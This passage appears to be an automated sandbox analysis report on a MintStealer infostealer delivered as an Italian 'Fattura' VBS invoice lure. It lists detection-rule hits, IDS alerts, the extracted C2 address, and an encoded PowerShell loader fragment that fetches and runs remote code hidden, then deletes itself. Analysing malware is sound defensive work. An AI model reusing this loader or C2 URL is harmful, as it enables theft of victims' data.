kZCAtZ3QgNTkpIHsKICAgICRSM1RZMGF2M3dGR2l2Ym1jSnE4QUViSTh1eVhkZEdoWDNBNjIzMU5nVTdFekhyc0s3dXVQID0gJFIzVFkwYXYzd0ZHaXZibWNKcThBRWJJOHV5WGRkR2hYM0E2MjMxTmdVN0V6SHJzSzd1dVAgKyAxOwogICAgJG1FN1ZPWWZOeWduendJTkFTTTlaQXFVS29ua2UxUlAyeFVvWlF1VEZxeEhxYTZtdWNqQmNMciA9ICRtRTdWT1lmTnlnbnp3SU5BU005WkFxVUtvbmtlMVJQMnhVb1pRdVRGcXhIcWE2bXVjakJjTHIgKyAkbUU3Vk9ZZk55Z256d0lOQVNNOVpBcVVLb25rZTFSUDJ4VW9aUXVURnF4SHFhNm11Y2pCY0xyQWRkIC0gNjA7Cn0gRWxzZSB7CiAgICAkbUU3Vk9ZZk55Z256d0lOQVNNOVpBcVVLb25rZTFSUDJ4VW9aUXVURnF4SHFhNm11Y2pCY0xyID0gJG1FN1ZPWWZOeWduendJTkFTTTlaQXFVS29ua2UxUlAyeFVvWlF1VEZxeEhxYTZtdWNqQmNMciArICRtRTdWT1lmTnlnbnp3SU5BU005WkFxVUtvbmtlMVJQMnhVb1pRdVRGcXhIcWE2bXVjakJjTHJBZGQ7Cn07CiRSM1RZMGF2M3dGR2l2Ym1jSnE4QUViSTh1eVhkZEdoWDNBNjIzMU5nVTdFekhyc0s3dXVQID0gSWYgKFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpICsgMSAtZ3QgMjMpIHsiMDAifSBFbHNlIHskUjNUWTBhdjN3RkdpdmJtY0pxOEFFYkk4dXlYZGRHaFgzQTYyMzFOZ1U3RXpIcnNLN3V1UH07CiRndERRODJOZjhVeWwwUnJlYTNqNW9BSTRTS053NnBoOVZmd0tTVnpucEFqNUNhdVBsZDdpZ2xia1lpZ1cgPSAkKC1qb2luICgoNjUuLjkwKSArICg5Ny4uMTIyKSB8IEdldC1SYW5kb20gLUNvdW50IDEyIHwgJSB7W2NoYXJdJF99KSk7CiRyZ2VUNEtCeHhLdUdnYUExdjVzd3lwID0gQCIKJEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKY3VybCAtdXNlYiAiaHR0cDovL3JpZ3p1dnppM2JuejMudG9wLzEucGhwP3M9bWludHMxMyIgfCBpZXg7ClJlbW92ZS1JdGVtICJDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXCQoJGd0RFE4Mk5mOFV5bDBScmVhM2o1b0FJNFNLTnc2cGg5VmZ3S1NWem5wQWo1Q2F1UGxkN2lnbGJrWWlnVykucHMxIiAtRm9yY2UgCiJAOwoKInBvd2Vyc2hlbGwgLW5vcHJvZmlsZSAtZXhlY3V0aW9ucG9saWN5IGJ5cGFzcyAtV2luZG93U3R5bGUgaGlkZGVuIC1jICQoJHJnZVQ0S0J4eEt
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura (5).vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura (5).vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura (5).vbs", ProcessId: 7520, ProcessName: wscript.exe
                  Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8176, TargetFilename: C:\Users\Public\Documents\KnHlMUPBukit.ps1
                  Source: Process startedAuthor: frack113: Data: Command: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\eGsnEKfw.bat", CommandLine: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\eGsnEKfw.bat", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura (5).vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7520, ParentProcessName: wscript.exe, ProcessCommandLine: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\eGsnEKfw.bat", ProcessId: 7920, ProcessName: powershell.exe
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura (5).vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura (5).vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura (5).vbs", ProcessId: 7520, ProcessName: wscript.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\eGsnEKfw.bat", CommandLine: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\eGsnEKfw.bat", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura (5).vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7520, ParentProcessName: wscript.exe, ProcessCommandLine: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\eGsnEKfw.bat", ProcessId: 7920, ProcessName: powershell.exe
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8176, TargetFilename: C:\Users\Public\Documents\KnHlMUPBukit.ps1
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-18T17:09:23.338238+010020570631A Network Trojan was detected192.168.2.449736168.100.9.2980TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-18T17:09:23.338238+010028582911A Network Trojan was detected192.168.2.449736168.100.9.2980TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: http://rigzuvzi3bnz3.top/1.php?s=miAvira URL Cloud: Label: malware
                  Source: amsi64_8176.amsi.csvMalware Configuration Extractor: MintStealer {"C2 url": "http://rigzuvzi3bnz3.top/1.php?s=mints13"}
                  Source: Fattura (5).vbsReversingLabs: Detection: 24%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.4% probability
                  Source: Binary string: utomation.pdb0 source: powershell.exe, 00000009.00000002.2188666275.0000024FBE243000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000009.00000002.2218015479.0000024FD83F8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ion.pdb source: powershell.exe, 00000009.00000002.2217492712.0000024FD817A000.00000004.00000020.00020000.00000000.sdmp

                  Software Vulnerabilities

                  barindex
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                  Networking

                  bar